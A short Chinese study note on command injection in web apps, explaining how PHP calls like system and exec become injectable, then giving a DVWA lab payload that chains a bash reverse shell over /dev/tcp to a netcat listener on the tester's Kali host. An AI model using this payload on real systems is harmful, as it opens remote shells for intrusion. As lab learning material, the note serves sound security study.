命令注入笔记

概述

应用有时需要调用一些执行系统命令的函数,如PHP中的systemexecshell_execpassthrupopenproc_popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命令。 拼接到正常命令中,从而造成命令注入攻击,这就是命令注入漏洞。

反弹shell

在kali上使用nc监听端口 nc -lvnp 5555 在dvwa web页面输入攻击payload : 127.0.0.1|bash -i >& /dev/tcp/172.16.1.2/5555 0>&1,其中172.16.1.2换成自己kali的ip。

总结

linux服务器的安全baseline:不能出现wgetcurlgitgcc等命令。

你可能感兴趣的:(漏洞原理,linux,网络安全)